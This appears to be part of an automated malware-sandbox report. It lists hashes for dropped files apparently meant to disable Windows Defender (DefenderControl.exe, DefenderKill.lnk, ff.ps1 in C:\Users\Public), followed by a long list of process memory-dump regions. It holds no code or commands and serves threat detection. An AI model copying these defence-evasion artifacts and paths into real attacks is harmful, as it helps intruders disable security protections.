C:\Users\Public\DefenderControl.exe
MD5
139464919440e93e49c80cc890b90585

SHA1
0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

SHA256
ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

SHA512
d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

Download Submit
C:\Users\Public\DefenderControl.exe
MD5
139464919440e93e49c80cc890b90585

SHA1
0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

SHA256
ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

SHA512
d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

Download Submit
C:\Users\Public\DefenderControl.exe
MD5
139464919440e93e49c80cc890b90585

SHA1
0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

SHA256
ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

SHA512
d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

Download Submit
C:\Users\Public\DefenderKill.lnk
MD5
429eeaa2203c3a2e0f214283715ae07e

SHA1
d63147618c6e92d5f38dc8816b633049f004c729

SHA256
d1394f2f94909d3351b663b93c5eb6ca902d3f9f21f528adf1fd86eeba8f819c

SHA512
a39e4f97f490e4255fd2356b7543e59771b1df98b502031b601d9125719c52e2af46a845e5627b27c0c5aa0e8587ab193dca4cf03d7c392eeb99a74c7257b76d

Download Submit
C:\Users\Public\ff.ps1
MD5
76689eadd2c4317ec7d2f5abe74df2ba

SHA1
99ca8d374b94518ccf47fd4ec4aa202059ad254d

SHA256
35c900caf65e96d12977782e9299b8d851e61ae9d0d6505f1a3a9c23cf0e79f0

SHA512
315770b7e176a5c217ae59ee26f2bfa7b9bd79138501a5be36b48cad2453a998a6fc4d89c9bae9250348a777416d691a6d3f777dffe6e745e3bf4d402e9cd97e

Download Submit
memory/580-223-0x0000000000000000-mapping.dmp

Download
memory/936-203-0x0000000005423000-0x0000000005424000-memory.dmp

Filesize
4KB

Download
memory/936-200-0x0000000005420000-0x0000000005421000-memory.dmp

Filesize
4KB

Download
memory/936-201-0x0000000005422000-0x0000000005423000-memory.dmp

Filesize
4KB

Download
memory/936-188-0x0000000000000000-mapping.dmp

Download
memory/1156-216-0x0000000000000000-mapping.dmp

Download
memory/1508-220-0x0000000004C84000-0x0000000004C86000-memory.dmp

Filesize
8KB

Download
memory/1508-219-0x0000000004C83000-0x0000000004C84000-memory.dmp

Filesize
4KB

Download
memory/1508-211-0x0000000004C82000-0x0000000004C83000-memory.dmp

Filesize
4KB

Download
memory/1508-210-0x0000000004C80000-0x0000000004C81000-memory.dmp

Filesize
4KB

Download
memory/1508-207-0x0000000000000000-mapping.dmp

Download
memory/1636-114-0x0000000000000000-mapping.dmp

Download
memory/2116-205-0x00000000072E2000-0x00000000072E3000-memory.dmp

Filesize
4KB

Download
memory/2116-209-0x00000000072E3000-0x00000000072E4000-memory.dmp

Filesize
4KB

Download
memory/2116-202-0x0000000000000000-mapping.dmp

Download
memory/2116-204-0x00000000072E0000-0x00000000072E1000-memory.dmp

Filesize
4KB

Download
memory/2128-215-0x0000000000000000-mapping.dmp

Download
memory/2424-150-0x0000000003612000-0x0000000003613000-memory.dmp

Filesize
4KB

Download
memory/2424-140-0x0000000000000000-mapping.dmp

Download
memory/2424-148-0x0000000003610000-0x0000000003611000-memory.dmp

Filesize
4KB

Download
memory/2424-176-0x0000000003613000-0x0000000003614000-memory.dmp

Filesize
4KB

Download
memory/2764-225-0x0000000000000000-mapping.dmp

Download
memory/2880-117-0x0000000000000000-mapping.dmp

Download
memory/2896-164-0x0000000000000000-mapping.dmp

Download
memory/2896-177-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/2896-186-0x0000000004993000-0x0000000004994000-memory.dmp

Filesize
4KB

Download
memory/2896-178-0x0000000004992000-0x0000000004993000-memory.dmp

Filesize
4KB

Download
memory/2920-231-0x0000000000000000-mapping.dmp

Download
memory/3676-229-0x0000000000000000-mapping.dmp

Download
memory/3900-221-0x0000000000000000-mapping.dmp

Download
memory/4028-128-0x00000000046B2000-0x00000000046B3000-memory.dmp

Filesize
4KB

Download
memory/4028-129-0x00000000079E0000-0x00000000079E1000-memory.dmp

Filesize
4KB

Download
memory/4028-130-0x0000000007850000-0x0000000007851000-memory.dmp

Filesize
4KB

Download
memory/4028-131-0x0000000007DD0000-0x0000000007DD1000-memory.dmp

Filesize
4KB

Download
memory/4028-127-0x00000000046B0000-0x00000000046B1000-memory.dmp

Filesize
4KB

Download
memory/4028-126-0x0000000007970000-0x0000000007971000-memory.dmp

Filesize
4KB

Download
memory/4028-125-0x0000000007720000-0x0000000007721000-memory.dmp

Filesize
4KB

Download
memory/4028-124-0x0000000006EF0000-0x0000000006EF1000-memory.dmp

Filesize
4KB

Download
memory/4028-132-0x0000000008130000-0x0000000008131000-memory.dmp

Filesize
4KB

Download
memory/4028-123-0x0000000007080000-0x0000000007081000-memory.dmp

Filesize
4KB

Download
memory/4028-122-0x0000000004580000-0x0000000004581000-memory.dmp

Filesize
4KB

Download
memory/4028-137-0x0000000009820000-0x0000000009821000-memory.dmp

Filesize
4KB

Download
memory/4028-119-0x0000000000000000-mapping.dmp

Download
memory/4028-138-0x0000000008DC0000-0x0000000008DC1000-memory.dmp

Filesize
4KB

Download
memory/4028-147-0x00000000046B3000-0x00000000046B4000-memory.dmp

Filesize
4KB

Download